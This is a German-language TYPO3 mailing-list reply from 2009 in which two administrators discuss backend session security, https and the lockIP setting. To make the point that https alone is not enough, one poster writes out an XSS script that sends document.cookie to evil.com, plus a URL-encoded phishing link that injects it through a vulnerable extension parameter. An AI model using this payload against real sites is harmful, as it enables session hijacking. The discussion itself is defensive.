[TYPO3-german] [TYPO3 german] TYPO3 4.2.6 und 4.3.0alpha2 Logout sofort nach Login im Backend
Christian Wolff
chris at connye.com
Fri Apr 17 16:50:57 CEST 2009
Martin Schoenbeck schrieb:
> Hallo Christian,
>
> Christian Wolff schrieb:
>
>> Hi Martin,
>> https ist ist natürlich eine gute maßname. aber man sollte nicht davon
>> ausgehen das es das stehelen deines cookies unmöglich macht.
>
> Nein, es verhindert natürlich nur banales mitprotokollieren.
genau! legt die latte für den angreifer etwas höher. und wir wissen ja
alle das es komplette sicherheit nicht gibt. das man nur so sicher wie
möglich sein will. so das es andere leichtere und dadurch interessantere
ziele gibt.
>
>> folgens javascript würde auch trotz https deinen cookie klauen:
>>
>> <script>
>> new Image().src="https://evil.com/log.php?c="+encodeURI(document.cookie);
>> </script>
>>
>>
>> vorrausgesetzt jemand schaft es das auf irgend eine weise das auf deiner
>> domain zu platzieren.
>
> Klar. Muß er aber eben erstmal schaffen.
>
>> z.b durch eine extension die URL Parameter wieder auf der seite ausgibt.
>> dann könnte eine entsprechende URL den angrif enthalten.
>
> Nur warum sollte er sich dann die Mühe machen, das Cookie zu klauen, wenn
> er doch direkt per Javascript meinen Server steuern kann.
naja kann er ja nicht. wenn die verwundbare extension mit dem string
data nix anderes macht als sie wieder auszugeben. z.b weil, weil es
normalerweise genutzt wird um eine nachricht an den user von einer seite
zur anderen zu übergeben. kann ja sein das mit der lücke gar keine
anderen angriffe wie SQL-Injektion möglich sind.
>
>> und der angreifer schreibt dir einfach eine mail:
>> hey auf deiner seite passiert irgendwas komisches. hier die URL:
>>
>> https://www.good.de/index.php?id=13&tx_badExt%5Bdata%5D=%3Cscript%3E+new+Image().src%3D%22http%3A%2F%2Fevil.com%2Flog.cgi%3Fc%3D%22%2BencodeURI(document.cookie)%3B+%3C%2Fscript%3E
>>
>> du klickst guten glaubens auf die den link.
>
> Ähm nein. Mach ich nicht. Müßte ich ja einen an der Klatsche haben. Schon
> gerade, wenn ich noch eingeloggt bin.
gut dann bist du ein aufmerksamer mensch/admin. aber würdest du dich für
jeden deiner redakteure verbürgen? - ich würde es nicht tun. und was
passiert wenn man dir eine tiny url oder ähnliches schickt. wo du gar
nicht sehen kannst was sich dahinter verbirgt. alles eine frage des
aufwandes.
>> und das script würde den
>> cookie auf evil.com loggen. vorrausgesetzt du warst gerade angemeldet.
>>
>> lockIP abzuschalten alleine ist keine sicherheitslück es setzt aber den
>> schwierigkeits grad für einen angreifer herunter.
>
> Klar. Sonst hätte man das ja auch nicht extra kodiert.
hast du recht, währe ziemlich blödt eine option einzubauen die den
server automatisch hackbar macht :)
> Gruß Martin
gruss chris
--
Christian Wolff // Berlin
http://www.connye.com
some projects:
http://richtermediagroup.com | http://titanic.de |
http://fairplay-homepage.de
More information about the TYPO3-german
mailing list